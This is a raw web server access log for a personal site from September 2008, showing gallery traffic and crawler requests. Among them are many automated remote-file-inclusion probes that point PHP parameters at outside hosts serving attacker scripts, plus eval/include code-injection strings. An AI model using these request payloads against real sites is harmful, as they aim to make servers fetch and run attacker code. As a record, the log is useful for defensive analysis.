72.199.235.196 - - [20/Sep/2008:09:41:50 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-144_1.jpg HTTP/1.1" 200 396888 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:41:53 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-145_0.jpg HTTP/1.1" 200 240171 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:41:58 -0700] "GET /logs/access_080714.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:41:59 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:01 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0176.jpg HTTP/1.1" 200 328570 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:42:01 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:03 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1019.jpg HTTP/1.1" 200 410938 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:04 -0700] "GET /blog/wp-content/gallery/crestoc-2008/img_0127.jpg HTTP/1.1" 200 426309 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:05 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008_3.jpg HTTP/1.1" 200 486526 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:07 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-249.jpg HTTP/1.1" 200 354635 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:42:10 -0700] "GET /logs/access_080705.log//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:11 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 327680 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:26 -0700] "GET / HTTP/1.1" 200 91896 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:26 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:26 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:26 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:26 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:27 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:27 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
72.199.235.196 - - [20/Sep/2008:09:42:28 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:42:29 -0700] "GET /logs/access_080702.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:42:29 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:42:29 -0700] "GET /logs/access_080319.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
219.85.63.226 - - [20/Sep/2008:09:42:29 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.crosstalk.cc/NT_files/idfx.txt%0D? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:42:49 -0700] "GET /logs/index.php?option=com_metataggenerator&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:42:49 -0700] "GET /index.php?option=com_metataggenerator&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92516 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:42:51 -0700] "GET /logs/index.php?option=com_metataggenerator&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.244.233.121 - - [20/Sep/2008:09:42:52 -0700] "GET /index.php?option=com_metataggenerator&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92516 "-" "libwww-perl/5.805" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:42:53 -0700] "GET /logs/index.php?option=com_metataggenerator&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.88.18.196 - - [20/Sep/2008:09:42:54 -0700] "GET /index.php?option=com_metataggenerator&Itemid=&mosConfig_absolute_path=http://www.ipler.com/bo.do??? HTTP/1.1" 200 92516 "-" "libwww-perl/5.814" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:42:55 -0700] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:42:55 -0700] "GET /phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:42:55 -0700] "GET /logs/access_080324.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:42:56 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:43:05 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:43:40 -0700] "GET /logs/access_080710.log/phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:43:41 -0700] "GET /phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:43:41 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.160.224.35 - - [20/Sep/2008:09:43:43 -0700] "GET /logs/access_080615.log/phphtml.php?htmlclass_path=http://www.houstonreferee.com/images/news.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:43:53 -0700] "GET /logs/access_080401.log/index.php?Load=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:43:54 -0700] "GET /logs/index.php?Load=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.48 - - [20/Sep/2008:09:44:05 -0700] "GET /logs/access_080828.log/index.php?Load=http://www.geocities.com/desirisma/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.195.37.158 - - [20/Sep/2008:09:44:17 -0700] "GET /logs/access.log HTTP/1.0" 200 309113 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.249.70.114 - - [20/Sep/2008:09:44:39 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-112.jpg HTTP/1.1" 200 681132 "-" "Googlebot-Image/1.0" "dmulk.com"
61.47.10.168 - - [20/Sep/2008:09:44:44 -0700] "GET /logs/access_080102.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.10.168 - - [20/Sep/2008:09:44:44 -0700] "GET /logs/access_071221.log/admin/editor2/spaw_control.class.php?spaw_root=http://www.natusa.spb.ru/skins/breeze/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [20/Sep/2008:09:44:57 -0700] "GET /logs/access_080815.log//errors.php?error=http://www.pet-ijmond.nl/admin/includes/source?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:45:22 -0700] "GET /logs/access_080123.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:45:29 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:45:31 -0700] "GET /logs//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:45:32 -0700] "GET /logs//index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:45:32 -0700] "GET //index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 7948 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.76.130 - - [20/Sep/2008:09:45:33 -0700] "GET //index.php?view=page&pagename=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 200 7948 "-" "libwww-perl/5.805" "www.dmulk.com"
189.143.75.202 - - [20/Sep/2008:09:46:13 -0700] "GET /logs/access_080228.log HTTP/1.1" 200 1655455 "http://www.google.com/search?q=201.134.249.164&rls=com.microsoft:*:IE-Address&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7DAMX_es" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
66.249.70.114 - - [20/Sep/2008:09:46:47 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-265.jpg HTTP/1.1" 200 488517 "-" "Googlebot-Image/1.0" "dmulk.com"
66.249.70.114 - - [20/Sep/2008:09:47:19 -0700] "GET /bikes/occcb/eBayISAPI.dll_files/iconGryBul_16x16.gif HTTP/1.1" 200 61 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
62.112.193.46 - - [20/Sep/2008:09:47:38 -0700] "GET /admin_forums.php?phpbb_root_path=http://jeanealogy.com/histories/.../.../.../.../.../.../.../check.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
62.112.193.46 - - [20/Sep/2008:09:47:38 -0700] "GET /logs/admin_forums.php?phpbb_root_path=http://jeanealogy.com/histories/.../.../.../.../.../.../.../check.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.231.138.99 - - [20/Sep/2008:09:47:44 -0700] "GET /logs/access_080902.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.231.138.99 - - [20/Sep/2008:09:47:46 -0700] "GET /logs/access_080831.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.rooksgambit.org/thebigsystem//sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.139.251.55 - - [20/Sep/2008:09:48:30 -0700] "GET /logs/access_071219.log/subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.251.55 - - [20/Sep/2008:09:48:30 -0700] "GET /subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.139.251.55 - - [20/Sep/2008:09:48:31 -0700] "GET /logs/subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.48.189.45 - - [20/Sep/2008:09:48:47 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.asa-auto.ba/mambo/cache/coi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
200.48.189.45 - - [20/Sep/2008:09:48:47 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.asa-auto.ba/mambo/cache/coi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
200.48.189.45 - - [20/Sep/2008:09:48:54 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.asa-auto.ba/mambo/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
200.48.189.45 - - [20/Sep/2008:09:48:54 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.asa-auto.ba/mambo/cache/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
63.247.78.2 - - [20/Sep/2008:09:48:57 -0700] "GET /logs/access_071219.log/subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.247.78.2 - - [20/Sep/2008:09:48:58 -0700] "GET /subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
63.247.78.2 - - [20/Sep/2008:09:48:58 -0700] "GET /logs/subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
61.152.144.67 - - [20/Sep/2008:09:49:19 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [20/Sep/2008:09:49:19 -0700] "GET //skin/zero_vote/error.php?dir=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [20/Sep/2008:09:49:19 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [20/Sep/2008:09:49:19 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.232.89.11 - - [20/Sep/2008:09:49:30 -0700] "GET /logs/access_071219.log/subscp.php?phpbb_root_path=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.232.89.11 - - [20/Sep/2008:09:49:30 -0700] "GET /subscp.php?phpbb_root_path=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.232.89.11 - - [20/Sep/2008:09:49:31 -0700] "GET /logs/subscp.php?phpbb_root_path=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:09:49:32 -0700] "GET /logs/access_080301.log//skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:09:49:32 -0700] "GET //skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:09:49:33 -0700] "GET /logs/access_080301.log//skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:09:49:33 -0700] "GET //skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:09:49:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:09:49:34 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.96.130 - - [20/Sep/2008:09:49:43 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://upfcorp.com/components/.bash/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [20/Sep/2008:09:49:43 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://upfcorp.com/components/.bash/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [20/Sep/2008:09:49:47 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://upfcorp.com/components/.bash/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.96.130 - - [20/Sep/2008:09:49:47 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://upfcorp.com/components/.bash/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.139.251.55 - - [20/Sep/2008:09:49:50 -0700] "GET /logs/access_071212.log/subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [20/Sep/2008:09:49:54 -0700] "GET /logs/access_080102.log//skin/zero_vote/error.php?dir=http://www.webana.com//modules/Forums/admin/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:50:05 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:50:06 -0700] "GET /logs/access_080131.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:50:18 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:50:18 -0700] "GET //skin/zero_vote/error.php?dir=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:50:18 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:50:27 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
141.44.140.111 - - [20/Sep/2008:09:50:31 -0700] "GET /logs/access_080324.log//skin/zero_vote/error.php?dir=http://p-c-b.info/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
63.247.78.2 - - [20/Sep/2008:09:50:42 -0700] "GET /logs/access_071212.log/subscp.php?phpbb_root_path=http://saturntv.ru/images/inform.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:09:51:03 -0700] "GET /logs/access_071222.log//components/errors.php?error=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:09:51:03 -0700] "GET //components/errors.php?error=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:09:51:03 -0700] "GET /logs/access_080502.log//components/errors.php?error=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.24.32 - - [20/Sep/2008:09:51:03 -0700] "GET /logs//components/errors.php?error=http://www.timtom.it/old.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.232.89.11 - - [20/Sep/2008:09:51:10 -0700] "GET /logs/access_071212.log/subscp.php?phpbb_root_path=http://www.on-linegames.com/arcade/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.34.216.2 - - [20/Sep/2008:09:51:35 -0700] "GET /logs/access_080816.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:51:49 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:51:49 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:51:50 -0700] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [20/Sep/2008:09:51:51 -0700] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.alevichat.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
222.122.56.174 - - [20/Sep/2008:09:52:05 -0700] "GET /logs/access_080102.log//skin/zero_vote/error.php?dir=http://www.fixfliprent.com/classifieds/adpics/46e80be856f8a5e89718544ce.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.34.216.2 - - [20/Sep/2008:09:52:16 -0700] "GET /logs/access_080825.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://piti.100megsfree8.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.225 - - [20/Sep/2008:09:52:33 -0700] "GET /?show=gallery&pageid=17 HTTP/1.0" 200 161783 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.43.6.114 - - [20/Sep/2008:09:52:38 -0700] "GET /logs/?mosConfig_absolute_path=http://escortreview.com/_notes/index.php/echo? HTTP/1.1" 200 65877 "-" "libwww-perl/5.810" "www.dmulk.com"
